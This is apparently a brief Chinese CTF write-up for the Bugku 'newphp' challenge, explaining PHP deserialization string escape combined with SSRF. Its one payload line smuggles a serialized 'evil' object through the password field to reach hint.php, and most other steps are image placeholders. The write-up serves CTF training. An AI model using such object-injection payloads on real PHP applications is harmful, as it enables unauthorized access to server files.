【bugku】-newphp

天悦哥

 关注

阅读 107

2022-04-05

可以看这篇文章

考点:PHP序列化逃逸+ssrf

1、 审代码

在这里插入图片描述

2、 PHP反序列化字符串逃逸的条件:先进行序列化,再进行字符串替换。

在这里插入图片描述
所以需要反序列化出一个evil()类。而字符串逃逸可以。

浅析php反序列化字符串逃逸

3、 思路

在这里插入图片描述

4、 payload

username=\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0&password=a";O:4:"evil":2:{s:4:"hint";s:8:"hint.php";}

在这里插入图片描述

5、 base64解码

在这里插入图片描述
在这里插入图片描述

6、 访问

在这里插入图片描述

7、 ssrf

在这里插入图片描述

相关推荐

Bugku 逆向

颜路在路上 44 0 0

BugKu-Web

IT程序员 108 0 0

BUGKU 变量1

一点读书 99 0 0

BUGKU------flag被盗

幸甚至哉歌以咏志 62 0 0

【bugku】Flask_FileUpload

at小涛 151 0 0

bugku头等舱

一葉_code 55 0 0

BugKu-WEB-sodirty

老榆 26 0 0

bugku-web-矛盾

司马吹风 7 0 0

BUGKU------中国菜刀

狗啃月亮_Rachel 86 0 0

Bugku之眼见非实

闲嫌咸贤 63 0 0

精彩评论(0)

0 0 举报